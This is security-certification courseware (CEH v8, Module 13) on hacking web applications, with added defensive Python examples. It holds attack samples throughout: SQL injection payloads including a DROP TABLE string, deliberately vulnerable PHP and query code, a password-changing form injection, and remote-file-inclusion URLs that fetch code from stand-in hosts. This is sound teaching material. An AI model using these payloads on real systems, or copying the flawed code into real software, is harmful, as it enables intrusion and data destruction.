
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker

Hacking Web Applications

Hacking Web Applications
Module 13

Engineered by Hackers. Presented by Professionals.

CEH
Ethical Hacking and Countermeasures v8
Module 13: Hacking Web Applications
Exam 312-50

Module 13 Page 1724 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.

Security News

XSS Attacks Lead Pack As Most Frequent Attack Type

Source: http://www.darkreading.com

Secure cloud hosting company, FireHost, has today announced the findings of its latest web application attack report, which provides statistical analysis of the 15 million cyber-attacks blocked by its servers in the US and Europe during Q3 2012. The report looks at attacks on the web applications, databases and websites of FireHost's customers between July and September, and offers an impression of the current internet security climate as a whole.

Amongst the cyber-attacks registered in the report, FireHost categorises four attack types in particular as representing the most serious threat. These attack types are among FireHost's 'Superfecta' and they consist of Cross-site Scripting (XSS), Directory Traversals, SQL Injections, and Cross-site Request Forgery (CSRF).

One of the most significant changes in attack traffic seen by FireHost between Q2 and Q3 2012 was a considerable rise in the number of cross-site attacks, in particular XSS and CSRF attacks rose to represent 64% of the group in the third quarter (a 28% increased penetration). XSS is now the most common attack type in the Superfecta, with CSRF now in second. FireHost's servers blocked more than one million XSS attacks during this period alone, a figure which rose


Module Objectives

• How Web Applications Work
• Web Attack Vectors
• Web Application Threats
• Web App Hacking Methodology
• Footprint Web Infrastructure
• Hacking Web Servers
• Analyze Web Applications
• Attack Authentication Mechanism
• Attack Authorization Schemes
• Session Management Attack
• Attack Data Connectivity
• Attack Web App Client
• Attack Web Services
• Web Application Hacking Tools
• Countermeasures
• Web Application Security Tools
• Web Application Firewall
• Web Application Pen Testing

Module Objectives

The main objective of this module is to show the various kinds of vulnerabilities that can be discovered in web applications. The attacks exploiting these vulnerabilities are also highlighted. The module starts with a detailed description of web applications. Various web application threats are mentioned. The hacking methodology reveals the various steps involved in a planned attack. The various tools that attackers use are discussed to explain the way they exploit vulnerabilities in web applications. The countermeasures that can be taken to thwart any such attacks are also highlighted. Security tools that help network administrators to monitor and manage web applications are described. Finally, web application pen testing is discussed.

This module familiarizes you with:

Module Flow

Web applications are application programs that can be accessed only over an Internet connection. These applications use HTTP as their primary communication protocol. Generally, attackers target these apps for several reasons; they are exposed to various attacks. For a clear understanding of "hacking web applications", we have divided the concept into the following sections:

• Web App Concepts
• Web App Threats
• Hacking Methodology
• Web Application Hacking Tools
• Countermeasures
• Security Tools
• Web App Pen Testing

Let us begin with the Web App concepts.


Web Application Security Statistics

[Chart: share of web applications affected by each vulnerability class; labels legible on the slide include Cross-Site Scripting and Information Leakage]

Web Application Security Statistics

Source: https://www.whitehatsec.com

According to the WhiteHat Security website statistics report for 2012, it is clear that cross-site scripting vulnerabilities are found on more web applications than any other class of vulnerability. From the graph you can observe that in the year 2012, cross-site scripting vulnerabilities were the most common, found in 55% of the web applications. Only 10% of web application attacks are based on insufficient session expiration vulnerabilities. In order to minimize the risks associated with cross-site scripting vulnerabilities in web applications, you have to adopt the necessary countermeasures against them.


Introduction to Web Applications

• Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser
• Though web applications enforce certain security policies, they are vulnerable to various attacks such as SQL injection, cross-site scripting, session hijacking, etc.
• Web applications and Web 2.0 technologies are invariably used to support critical business functions such as CRM, SCM, etc. and improve business efficiency
• New web technologies such as Web 2.0 provide more attack surface for web application exploitation

Introduction to Web Applications

Web applications are the applications that run on a remote web server and send their output over the Internet. Web 2.0 technologies are used by all web-server-based applications for purposes such as communication with users, clients, third-party users, etc.

A web application is comprised of many layers of functionality. However, it is considered a three-layered architecture consisting of presentation, logic, and data layers.

The web architecture relies substantially on the technology popularized by the World Wide Web, Hypertext Markup Language (HTML), and the primary transport medium, i.e. Hypertext Transfer Protocol (HTTP). HTTP is the medium of communication between the server and the client. Typically, it operates over TCP port 80, but it may also communicate over another, otherwise unused port.

Web applications provide an interface between end users and web servers through a set of web pages that are generated at the server end or contain script code to be executed dynamically within the client web browser.

Some of the popular web servers present today are Microsoft IIS, Apache Software Foundation's Apache HTTP Server, AOL/Netscape's Enterprise Server, and Sun One. Resources are called Uniform Resource Identifiers (URIs), and they may either be static pages or contain dynamic content. Since HTTP is stateless, i.e., the protocol does not maintain a session state,



Web Application Components

The components of web applications are listed as follows:

Login: Most websites allow authentic users to access the application by means of a login. This means that to access the service or content offered by the web application, the user needs to submit his/her username and password. Example: gmail.com

The Web Server: It refers to either software or hardware intended to deliver web content that can be accessed through the Internet. An example is the web pages served to the web browser by the web server.

Session Tracking Mechanism: Each web application has a session tracking mechanism. The session can be tracked by using cookies, URL rewriting, or Secure Sockets Layer (SSL) information.

User Permissions: When you are not allowed to access the specified web page with the user permissions you are logged in with, you may be redirected again to the login page or to any other page.

The Application Content: It is an interactive program that accepts web requests from clients and uses the parameters that are sent by the web browser for carrying out certain functions.

Data Access: Usually the web pages interact with one another via a data access library in which all the database details are stored.


How Web Applications Work

[Diagram: the browser request for a news item reaches the web server, which runs the query below against the database and returns the matching row as output]

SELECT * from news where id = 6329

ID    Topic  News
6329  Tech   CNN

How Web Applications Work

Whenever someone clicks or types in the browser, the requested website or content is immediately displayed on the screen of the computer, but what is the mechanism behind this? The following is the step-by-step process that takes place once a user sends a request for particular content or a website, in which multiple computers are involved.

The web application model is explained in three layers. The first layer deals with the user input through a web browser or user interface. The second layer contains JSP (Java servlets) or ASP (Active Server Pages), the dynamic content generation technology tools, and the last layer contains the database for storing customer data such as user names and passwords, credit card details, etc. or other related information.

Let's see how the user triggers the initial request through the browser to the web application server:

• First, the user types the website name or URL in the browser and the request is sent to the web server.
• On receiving the request, the web server checks the file extension:
  • If the user requests a simple web page with an HTM or HTML extension, the web server processes the request and sends the file to the user's browser.


Web Application Architecture

[Diagram: clients and web services reach the application over the Internet through a firewall, proxy server and cache. Presentation layer: HTTP request parser, servlet container, resource handler, authentication and login. Business layer: application server (J2EE, .NET, COM, COM+, C++, XCode), business logic, legacy application. Data access layer beneath.]

Web Application Architecture

All web applications execute with the help of the web browser as a supporting client. The web applications use a group of server-side scripts (ASP, PHP, etc.) and client-side scripts (HTML, JavaScript, etc.) to execute the application. The information is presented by using the client-side script, and tasks such as storing and gathering the required data are carried out by the server-side script.

In the following architecture, the clients use different devices, web browsers, and external web services over the Internet to get the application executed using different scripting languages. The data access is handled by the database layer using cloud services and a database server.


Web 2.0 Applications

• Blogs (WordPress)
• Advanced gaming
• New technologies like AJAX (Gmail, YouTube)
• Dynamic as opposed to static site content
• Mobile applications (iPhone)
• RSS-generated syndication
• Flash rich interface websites
• Social networking sites (Flickr, Facebook, del.icio.us)
• Frameworks (Yahoo! UI Library, jQuery)
• Mash-ups (emails, IMs, electronic payment systems)
• Cloud computing websites like amazon.com
• Wikis and other collaborative applications
• Google Base and other free Web services (Google Maps)
• Interactive encyclopedias and dictionaries
• Online office software (Google Docs and Microsoft Light)
• Ease of data creation, modification, or deletion by individual users

Web 2.0 Applications

Web 2.0 refers to a new generation of web applications that provide an infrastructure for more dynamic user participation, social interaction, and collaboration. It offers various features such as:

• Advanced gaming
• Dynamic as opposed to static site content
• RSS-generated syndication
• Social networking sites (Flickr, Facebook, del.icio.us)
• Mash-ups (emails, IMs, electronic payment systems)
• Wikis and other collaborative applications
• Google Base and other free web services (Google Maps)
• Ease of data creation, modification, or deletion by individual users
• Online office software (Google Docs and Microsoft Light)
• Interactive encyclopedias and dictionaries
• Cloud computing websites such as Amazon.com


Vulnerability Stack

Custom Web Applications: Business Logic Flaws; Technical Vulnerabilities
Third Party Components: Open Source / Commercial
Database: Oracle / MySQL / MS SQL
Web Server: Apache / Microsoft IIS
Operating System: Windows / Linux / OS X
Network: Router / Switch
Security: IPS / IDS

Vulnerability Stack

Web applications are maintained and accessed through various levels that include: custom web applications, third-party components, databases, web servers, operating systems, networks, and security. All the mechanisms or services employed at each level help the user in one way or another to access the web application securely. When talking about web applications, security is a critical component to be considered because web applications are a major source of attacks. The vulnerability stack shows the levels and the corresponding element/mechanism/service employed at each level that makes the web applications vulnerable.


Web Attack Vectors

• An attack vector is a path or means by which an attacker can gain access to computer or network resources in order to deliver an attack payload or cause a malicious outcome
• Attack vectors include parameter manipulation, XML poisoning, client validation, server misconfiguration, web service routing issues, and cross-site scripting
• Security controls need to be updated continuously as the attack vectors keep changing with respect to a target of attack

Web Attack Vectors

An attack vector is a method of entering unauthorized systems to perform malicious attacks. Once the attacker gains access to the system or the network, he or she delivers an attack payload or causes a malicious outcome. No protection method is completely attack-proof, as attack vectors keep changing and evolving with new technological changes.

Examples of various types of attack vectors:

• Parameter manipulation: Providing a wrong input value to the web services by the attacker and gaining control over the SQL, LDAP, XPATH, and shell commands. When incorrect values are provided to the web services, they become vulnerable, and the web applications running with those web services are easily attacked.
• XML poisoning: Attackers provide manipulated XML documents that, when executed, can disturb the logic of the parsing method on the server. When huge XMLs are executed at the application layer, they can easily be compromised by the attacker to launch his or her attack and gather information.
• Client validation: Most client-side validation has to be supported by server-side authentication. The AJAX routines can be easily manipulated, which in turn makes a way for attackers to carry out SQL injection, LDAP injection, etc. and compromise the web application's key resources.

Module Flow

Web applications are targeted by attackers for various reasons. The first issue is that the quality of the source code as it relates to security is poor, and another issue is an application with a "complex setup." Due to these loopholes, attackers can easily launch attacks by exploiting them. Now we will discuss the threats associated with web applications.

[Module flow: Web App Concepts → Web App Threats → Hacking Methodology → Web Application Hacking Tools → Countermeasures → Security Tools → Web App Pen Testing]


Web Application Threats - 1

[Slide: threat labels legible on the slide include Information Leakage, Broken Account Management, Cookie Poisoning, Improper Error Handling, and a truncated "Storage" label]

Web Application Threats - 1

Web application threats are not limited to attacks based on URLs and port 80. Regardless of the ports, protocols, and OSI layer used, the integrity of mission-critical applications must be protected from possible future attacks. Vendors who want to protect their products' applications must be able to deal with all methods of attack.

The various types of web application threats are as follows:

Cookie Poisoning

By changing the information inside the cookie, attackers bypass the authentication process, and once they gain control over the network, they can either modify the content, use the system for the malicious attack, or steal information from the user's system.

Directory Traversal

Attackers exploit HTTP by using directory traversal and are able to access restricted directories; they execute commands outside of the web server's root directory.

Unvalidated Input

In order to bypass the security system, attackers tamper with the HTTP requests, URL, headers, form fields, hidden fields, query strings, etc. Users' login IDs and other related


Web Application Threats - 2

• Platform Exploits
• Insecure Direct Object References
• Insufficient Transport Layer Protection
• Failure to Restrict URL Access
• Insecure Cryptographic Storage
• Obfuscation Application
• Security Management Exploits
• DMZ Protocol Attacks
• Unvalidated Redirects and Forwards
• Authentication Hijacking
• Web Services Attacks
• Session Fixation Attack
• Malicious File Execution

Web Application Threats - 2

Platform Exploits

Various web applications are built by using different platforms such as BEA WebLogic and ColdFusion. Each platform has various vulnerabilities and exploits associated with it.

Insecure Direct Object References

When various internal implementation objects such as a file, directory, database record, or key are exposed through a reference by a developer, an insecure direct object reference takes place.

For example, where a bank account number is made a primary key, there is a good chance it can be compromised by the attacker based on such references.
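As an added illustration of the bank-account case above (example code, not from the CEH courseware; the account numbers, owners, balances and session users are constructed sample data), the direct lookup is shown beside two hardened forms: an ownership check on every access, and per-session indirect references so the real key never leaves the server.

```python
"""Insecure direct object references: the bank-account example, hardened."""
# Added example, not CEH courseware. The account numbers, owners and balances
# below are constructed sample data standing in for the bank database in which
# the account number is the primary key. get_account_direct() is the exposed
# reference the text warns about; get_account_checked() adds the missing
# ownership check, and Session shows per-session indirect references so the
# real key never appears in a URL or form field.
import secrets
from typing import Dict, Optional, Tuple

ACCOUNTS = {  # constructed: primary key -> record
    "10045678": {"owner": "alice", "balance": 2500},
    "10045679": {"owner": "bob", "balance": 150},
}


def get_account_direct(account_no: str) -> Optional[dict]:
    """Vulnerable: the key from the request is looked up as-is, so any
    logged-in user who changes the number reads someone else's account."""
    return ACCOUNTS.get(account_no)


def get_account_checked(session_user: str, account_no: str) -> Optional[dict]:
    """Hardened (1): authorise against the logged-in user on every access.
    Missing and foreign objects get the same answer, so the response does
    not reveal which account numbers exist."""
    acct = ACCOUNTS.get(account_no)
    if acct is None or acct["owner"] != session_user:
        return None
    return acct


class Session:
    """Hardened (2): per-session indirect references. The client only ever
    handles random tokens; the server maps them back to real keys."""

    def __init__(self, user: str) -> None:
        self.user = user
        self._ref_to_key: Dict[str, str] = {}
        self._key_to_ref: Dict[str, str] = {}

    def reference_for(self, account_no: str) -> str:
        """Issue (or reuse) an opaque token for an object this user owns."""
        if ACCOUNTS.get(account_no, {}).get("owner") != self.user:
            raise PermissionError("account does not belong to this session")
        if account_no not in self._key_to_ref:
            ref = secrets.token_urlsafe(8)
            self._key_to_ref[account_no] = ref
            self._ref_to_key[ref] = account_no
        return self._key_to_ref[account_no]

    def resolve(self, ref: str) -> Optional[dict]:
        """Map a token back to the record; the ownership check still runs."""
        key = self._ref_to_key.get(ref)
        return get_account_checked(self.user, key) if key else None


def indirect_reference_demo() -> Tuple[int, Optional[dict]]:
    """Alice's token resolves in her session and in no other."""
    alice, bob = Session("alice"), Session("bob")
    ref = alice.reference_for("10045678")
    return alice.resolve(ref)["balance"], bob.resolve(ref)


if __name__ == "__main__":
    print("direct lookup of a foreign key:", get_account_direct("10045679"))
    print("checked lookup as alice:", get_account_checked("alice", "10045679"))
    print("indirect references (alice, bob):", indirect_reference_demo())
```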

Insecure Cryptographic Storage

When sensitive data is stored in the database, it has to be properly encrypted using cryptography. A few cryptographic encryption methods developed by developers are not up to par; cryptographically very strong encryption methods have to be used. At the same time, care must be taken in storing the cryptographic keys. If these keys are stored in insecure places, the attacker can obtain them easily and decrypt the sensitive data.


Unvalidated Input

• Input validation flaws refer to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers
• An attacker exploits input validation flaws to perform cross-site scripting, buffer overflow, injection attacks, etc. that result in data theft and system malfunctioning

[Diagram: browser input, not validated by the web application at juggyboy.com, is passed straight to the database]

Browser Post Request:
http://juggyboy.com/login.aspx?user=jason&pass=springfield

Modified Query:
string sql = "select * from Users where user='" + User.Text + "' and pwd='" + Password.Text + "'";

Unvalidated Input

An input validation flaw refers to a web application vulnerability where input from a client is not validated before being processed by web applications and backend servers. Sites try to protect themselves from malicious attacks through input filtering, but there are various methods prevailing for the purpose of encoding. Many HTTP inputs have multiple formats that make filtering very difficult. The canonicalization method is used to simplify the encodings and is useful in avoiding various attacks. Web applications that use only a client-side mechanism for input validation can easily be bypassed by attackers. In order to bypass the security system, attackers tamper with the HTTP requests, URLs, headers, form fields, hidden fields, and query strings. Users' login IDs and other related data get stored in the cookies, and this becomes a source of attack for intruders. Attackers gain access to the systems by using the information present in the cookies. Various methods used by hackers are SQL injection, cross-site scripting (XSS), buffer overflows, format string attacks, cookie poisoning, and hidden field manipulation, which result in data theft and system malfunctioning.

Module 13 Page 1756 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Exam 312-50 Certified Ethical Hacker
Hacking Web Applications


Parameter/Form Tampering

• A web parameter tampering attack involves the manipulation of parameters exchanged between client and server in order to modify application data such as user credentials and permissions, price, and quantity of products
• A parameter tampering attack exploits vulnerabilities in integrity and logic validation mechanisms that may result in XSS, SQL injection, etc.

Tampering with the URL parameters:
    http://www.juggybank.com/cust.asp?profile=21&debit=2500
    http://www.juggybank.com/cust.asp?profile=82&debit=150

Other parameters can be changed, including attribute parameters:
    http://www.juggybank.com/stat.asp?pg=531&status=view
    http://www.juggybank.com/stat.asp?pg=147&status=delete


Parameter/Form Tampering

Parameter tampering is a simple form of attack aimed directly at the application's business logic. This attack takes advantage of the fact that many programmers rely on hidden or fixed fields (such as a hidden tag in a form or a parameter in a URL) as the only security measure for certain operations. To bypass this security mechanism, an attacker can change these parameters.

Detailed Description

Serving the requested files is the main function of web servers. During a web session, parameters are exchanged between the web browser and the web application in order to maintain information about the client's session, which eliminates the need to maintain a complex database on the server side. URL queries, form fields, and cookies are used to pass the parameters.

Changed parameters in form fields are the best example of parameter tampering. When a user makes a selection on an HTML page, it is stored as a form field value and transferred to the web application in an HTTP request. These values may be pre-selected (combo box, check box, radio buttons, etc.), free text, or hidden. An attacker can manipulate these values. In some extreme cases, it is just like saving the page, editing the HTML, and reloading the page in the web browser.


Directory Traversal


Directory Traversal

When access is provided outside a defined application, there exists the possibility of unintended information disclosure or modification. Complex applications exist as application components and data, which are typically configured in multiple directories. An application has the ability to traverse these multiple directories to locate and execute the legitimate portions of an application. A directory traversal/forceful browsing attack occurs when the attacker is able to browse for directories and files outside the normal application access. A Directory Traversal/Forceful Browsing attack exposes the directory structure of an application, and often the underlying web server and operating system. With this level of access to the web application architecture, an attacker can:

• Enumerate the contents of files and directories

• Access pages that otherwise require authentication (and possibly payment)

• Gain secret knowledge of the application and its construction

• Discover user IDs and passwords buried in hidden files

• Locate source code and other interesting files left on the server

• View sensitive data, such as customer information
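The server-side check that stops the traversal described above, as an added example (this is not the module's own code): paths are resolved and compared against a constructed web root, and the URL path is decoded before checking. The web root, file names and sample requests are constructed for the demo.

```python
import os
import tempfile
from urllib.parse import unquote


def safe_join(base_dir, requested):
    """Resolve a client-supplied relative path inside base_dir.

    Returns the absolute path when it stays within base_dir, otherwise None.
    The comparison is done on resolved (realpath) forms, so '..' segments and
    symlinks cannot escape the directory.
    """
    base = os.path.realpath(base_dir)
    if os.path.isabs(requested):          # absolute paths ignore base_dir entirely
        return None
    target = os.path.realpath(os.path.join(base, requested))
    try:
        inside = os.path.commonpath([base, target]) == base
    except ValueError:                    # different drives on Windows: not inside
        inside = False
    return target if inside else None


def check_request(base_dir, raw_path):
    """Decode the URL path first, then apply the check.

    Decoding before checking matters: a '..%2F' that is checked while still
    encoded looks like an ordinary file name and would slip through.
    """
    decoded = unquote(raw_path)
    return "allowed" if safe_join(base_dir, decoded) else "blocked"


def audit(base_dir, raw_paths):
    """Label a batch of requested paths, e.g. taken from an access log."""
    return {p: check_request(base_dir, p) for p in raw_paths}


# Constructed sample requests, in the shape of the path part of a GET line.
SAMPLE_REQUESTS = [
    "images/logo.gif",               # ordinary request
    "images/../images/logo.gif",     # '..' that still stays inside the root
    "../../etc/passwd",              # classic traversal
    "/etc/passwd",                   # absolute path
    "images/..%2F..%2Fetc/passwd",   # URL-encoded separators
]


def demo():
    """Build a throwaway web root with one public file and audit the samples."""
    root = tempfile.mkdtemp()
    os.makedirs(os.path.join(root, "images"))
    with open(os.path.join(root, "images", "logo.gif"), "wb") as f:
        f.write(b"GIF89a")            # constructed placeholder content
    return audit(root, SAMPLE_REQUESTS)


if __name__ == "__main__":
    for path, verdict in demo().items():
        print("%-32s %s" % (path, verdict))
```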


Security Misconfiguration

Easy Exploitation
Using misconfiguration vulnerabilities, attackers gain unauthorized access to default accounts, read unused pages, exploit unpatched flaws, and read or write unprotected files and directories, etc.

Common Prevalence
Security misconfiguration can occur at any level of an application stack, including the platform, web server, application server, framework, and custom code

Example
• The application server admin console is automatically installed and not removed
• Default accounts are not changed
• Attacker discovers the standard admin pages on the server, logs in with default passwords, and takes over


Security Misconfiguration

Developers and network administrators should check that the entire stack is configured properly, as security misconfiguration can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. For instance, if the server is not configured properly, it results in various problems that can affect the security of a website. The problems that lead to such instances include server software flaws, unpatched security flaws, enabling unnecessary services, and improper authentication. A few of these problems can be detected easily with the help of automated scanners. Attackers can access default accounts, unused pages, unpatched flaws, unprotected files and directories, etc. to gain unauthorized access. All the unnecessary and unsafe features have to be taken care of, and it proves very beneficial if they are completely disabled so that outsiders cannot make use of them for malicious attacks. All the application-based files have to be protected through proper authentication and strong security methods, or crucial information can be leaked to attackers.

Examples of unnecessary features that should be disabled or changed include:

• The application server admin console is automatically installed and not removed

• Default accounts are not changed


Injection Flaws

• Injection flaws are web application vulnerabilities that allow untrusted data to be interpreted and executed as part of a command or query
• Attackers exploit injection flaws by constructing malicious commands or queries that result in data loss or corruption, lack of accountability, or denial of access
• Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. and can be easily discovered by application vulnerability scanners and fuzzers

SQL Injection: It involves the injection of malicious SQL queries into user input forms
Command Injection: It involves the injection of malicious code through a web application
LDAP Injection: It involves the injection of malicious LDAP statements


Injection Flaws

Injection flaws are loopholes in a web application that allow unreliable data to be interpreted and executed as part of a command or query. Attackers exploit injection flaws by constructing malicious commands or queries that result in loss or corruption of data, lack of accountability, or denial of access. Injection flaws are prevalent in legacy code, often found in SQL, LDAP, and XPath queries, etc. These flaws can be detected easily by application vulnerability scanners and fuzzers. By exploiting the flaws in the web application, the attacker can easily read, write, delete, and update any data, whether relevant or irrelevant to that particular application. There are many types of injection flaws; some of them are as follows:

SQL injection

SQL injection is the most common website vulnerability on the Internet. It is the technique used to take advantage of non-validated input vulnerabilities to pass SQL commands through a web application for execution by a backend database. In this, the attacker injects malicious SQL queries into the user input form, usually either to gain unauthorized access to a database or to retrieve information directly from the database.

Command injection

Command injection flaws are another type of web application vulnerability.


SQL Injection Attacks

• SQL injection attacks use a series of malicious SQL queries to directly manipulate the database
• An attacker can use a vulnerable web application to bypass normal security measures and obtain direct access to the valuable data
• SQL injection attacks can often be executed from the address bar, from within application fields, and through queries and searches

SQL injection vulnerable server code:

    <?php
    function save_email($user, $message)
    {
        $sql = "INSERT INTO Messages (
            user, message
        ) VALUES (
            '$user', '$message'
        )";
        return mysql_query($sql);
    }
    ?>

Attacker input sent from the web browser over the Internet:
    test'); DROP TABLE Messages; --
When this code is sent to the database server, it drops the Messages table.

Code to insert spammy data on behalf of other users:
    test'), ('user2', 'I am Jason'), ('user3', 'You are hacked

Note: For complete coverage of SQL Injection concepts and techniques, refer to Module 14: SQL Injection


SQL Injection Attacks

SQL injection attacks use command sequences from Structured Query Language (SQL) statements to control database data directly. Applications often use SQL statements to authenticate users to the application, validate roles and access levels, store and obtain information for the application and user, and link to other data sources. Using SQL injection methods, an attacker can use a vulnerable web application to avoid normal security measures and obtain direct access to valuable data.

The reason why SQL injection attacks work is that the application does not properly validate input before passing it to a SQL statement. For example, the following SQL statement:

    select * from tablename where UserID = 2302

becomes the following with a simple SQL injection attack:

    SELECT * FROM tablename WHERE UserID = 2302 OR 1=1

The expression "OR 1=1" evaluates to the value "TRUE," often allowing the enumeration of all user ID values from the database. SQL injection attacks can often be entered from the address bar, from within application fields, and through queries and searches. SQL injection attacks can allow an attacker to:

• Log in to the application without supplying valid credentials
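The concatenated login query from the Unvalidated Input slide and the "OR 1=1" tautology above, side by side with the parameterized form that defeats it, as an added example that is not the module's own code. It uses SQLite with a constructed Users table; the table layout and credentials are assumptions for the demo.

```python
import sqlite3

# Constructed sample data: a Users table like the one in the slide's login query.
SAMPLE_USERS = [
    ("jason", "springfield"),
    ("alice", "s3cret"),
    ("bob", "hunter2"),
]


def make_db():
    """Create an in-memory database holding the constructed sample users."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", SAMPLE_USERS)
    conn.commit()
    return conn


def login_vulnerable(conn, user, pwd):
    """Mirrors the slide's string-concatenated query (do not use in real code).

    The input is pasted straight into the SQL text, so quote characters and
    keywords in the input become part of the statement.
    """
    sql = ("select * from Users where user='" + user
           + "' and pwd='" + pwd + "'")
    return conn.execute(sql).fetchall()


def login_parameterized(conn, user, pwd):
    """Hardened version: placeholders keep the input as data, never as SQL."""
    sql = "select * from Users where user=? and pwd=?"
    return conn.execute(sql, (user, pwd)).fetchall()


def compare(user, pwd):
    """Return (rows matched by the vulnerable query, rows matched by the safe one)."""
    conn = make_db()
    try:
        weak = login_vulnerable(conn, user, pwd)
        safe = login_parameterized(conn, user, pwd)
    finally:
        conn.close()
    return len(weak), len(safe)


if __name__ == "__main__":
    # Legitimate credentials: both variants match exactly one row.
    print(compare("jason", "springfield"))
    # The module's tautology: the vulnerable query returns every user, the
    # parameterized one returns none because no user literally has that password.
    print(compare("jason", "x' OR '1'='1"))
```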


Command Injection Attacks

• An attacker tries to craft an input string to gain shell access to a web server
• Shell injection functions include system(), StartProcess(), java.lang.Runtime.exec(), System.Diagnostics.Process.Start(), and similar APIs
• This type of attack is used to deface websites virtually. Using this attack, an attacker adds extra HTML-based content to the vulnerable web application
• In HTML embedding attacks, user input to a web script is placed into the output HTML, without being checked for HTML code or scripting
• The attacker exploits this vulnerability and injects malicious code into system files
• http://www.juggyboy.com/vulnerable.php?COLOR=http://evil/exploit?


Command Injection Attacks

Command injection flaws allow attackers to pass malicious code to different systems via a web application. The attacks include calls to the operating system over system calls, use of external programs over shell commands, and calls to the backend databases over SQL. Scripts written in Perl, Python, and other languages can be executed and inserted into poorly designed web applications. If a web application uses any type of interpreter, attacks are inserted to inflict damage.

To perform functions, web applications must use operating system features and external programs. Although many programs are invoked externally, the most frequently used one is Sendmail. When a piece of information is passed through an HTTP request to an external program, it must be carefully scrubbed, or the attacker can insert special characters, malicious commands, and command modifiers into the information. The web application then blindly passes these characters to the external system for execution. Inserting SQL is dangerous and rather widespread, as it is a form of command injection. Command injection attacks are easy to carry out and discover, but they are tough to understand.

Shell Injection

To complete various functionalities, web applications use various applications and programs. It is just like sending an email by using the UNIX sendmail program. There is a chance that an attacker may inject code into these programs. This kind of attack is dangerous


Command Injection Example

Attacker launching code injection attack:
    http://juggyboy/cgi-bin/lspro/lspro.cgi?hit_out=1036

Malicious code:
    www.juggyboy.com/banner.gif||newpassword||1036|60|468

Form on JuggyBoy.com:
    User Name: Addison
    Email Address: addi@juggyboy.com
    Site URL: www.juggyboy.com
    Banner URL: www.juggyboy.com/banner.gif||newpassword||1036|60|468
    Password: newpassword

• An attacker enters malicious code (account number) with a new password
• The last two sets of numbers are the banner size
• Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword"
• The server script assumes that only the URL of the banner image file is inserted into that field
• Poor input validation at the server script was exploited in this attack, which uses database INSERT and UPDATE record commands


Command Injection Example

The following is an example of command injection:

To perform a command injection attack, the attacker first enters malicious code (an account number) with a new password. The last two sets of numbers are the banner size. Once the attacker clicks the submit button, the password for the account 1036 is changed to "newpassword." The server script assumes that only the URL of the banner image file is inserted into that field.
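Input scrubbing for both cases the Command Injection sections raise: a recipient handed to the sendmail program, and the banner URL field the CGI script above stores in a pipe-delimited record. This is an added example, not the module's or any script's own code; the sendmail path and the field formats are assumptions, and the hostile recipient value is constructed.

```python
import re
import subprocess

# Conservative allowlist for an address handed to sendmail (not a full RFC 5322
# parser). The first character is never '-', so the value cannot be read as an
# option, and no shell metacharacters or whitespace are allowed at all.
RECIPIENT_RE = re.compile(r"^[A-Za-z0-9_][A-Za-z0-9._+-]*@[A-Za-z0-9.-]+\.[A-Za-z]{2,}$")

# The banner field should be a single URL; the '|' record separator the CGI
# script uses, whitespace and control characters are never legitimate in it.
BANNER_URL_RE = re.compile(r"^(https?://)?[A-Za-z0-9.-]+(/[A-Za-z0-9._/-]*)?$")

SENDMAIL = "/usr/sbin/sendmail"   # assumed path to the MTA binary


def sendmail_command_unsafe(recipient):
    """The pattern the page warns about: input spliced into one shell string.

    Returned as a string rather than executed so the effect stays visible.
    """
    return SENDMAIL + " " + recipient


def sendmail_argv(recipient):
    """Hardened: validate, then build an argv list that no shell will parse."""
    if not RECIPIENT_RE.match(recipient):
        raise ValueError("rejected recipient: %r" % recipient)
    return [SENDMAIL, recipient]


def run_sendmail(recipient, body):
    """Invoke sendmail with shell=False (not called by the demo or tests)."""
    return subprocess.run(sendmail_argv(recipient), input=body.encode(),
                          shell=False, check=True)


def parse_banner_record(record):
    """Split the pipe-delimited record the slide's CGI script stores."""
    return record.split("|")


def validate_banner_url(value):
    """Accept only a plain URL; the slide's payload fails because of '|'."""
    return BANNER_URL_RE.match(value) is not None


def demo():
    legit = "addi@juggyboy.com"
    hostile = "addi@juggyboy.com; id"          # constructed: ';' is a shell separator
    payload = "www.juggyboy.com/banner.gif||newpassword||1036|60|468"  # from the slide
    results = {
        "unsafe_string": sendmail_command_unsafe(hostile),
        "argv_legit": sendmail_argv(legit),
        "banner_fields": len(parse_banner_record(payload)),
        "banner_payload_valid": validate_banner_url(payload),
        "banner_legit_valid": validate_banner_url("www.juggyboy.com/banner.gif"),
    }
    try:
        sendmail_argv(hostile)
        results["argv_hostile"] = "accepted"
    except ValueError:
        results["argv_hostile"] = "rejected"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, "->", value)
```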


File Injection Attack

Client code running in a browser:

    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>

Vulnerable PHP code:

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>

Attacker request:
    http://www.juggyboy.com/orders.php?DRINK=http://jasoneval.com/exploit?

• Attacker injects a remotely hosted file at www.jasoneval.com containing an exploit
• File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system



File Injection Attack

Users are allowed to upload various files on the server through various applications, and those files can be accessed through the Internet from anywhere in the world. If the file ends with a .php extension and any user requests it, then the application interprets it as a PHP script and executes it. This allows an attacker to perform arbitrary commands. File injection attacks enable attackers to exploit vulnerable scripts on the server to use a remote file instead of a presumably trusted file from the local file system. Consider the following client code running in a browser:

    <form method="get">
    <select name="DRINK">
    <option value="pepsi">pepsi</option>
    <option value="coke">coke</option>
    </select>
    <input type="submit">
    </form>

Vulnerable PHP code

    <?php
    $drink = 'coke';
    if (isset($_GET['DRINK']))
        $drink = $_GET['DRINK'];
    require($drink . '.php');
    ?>
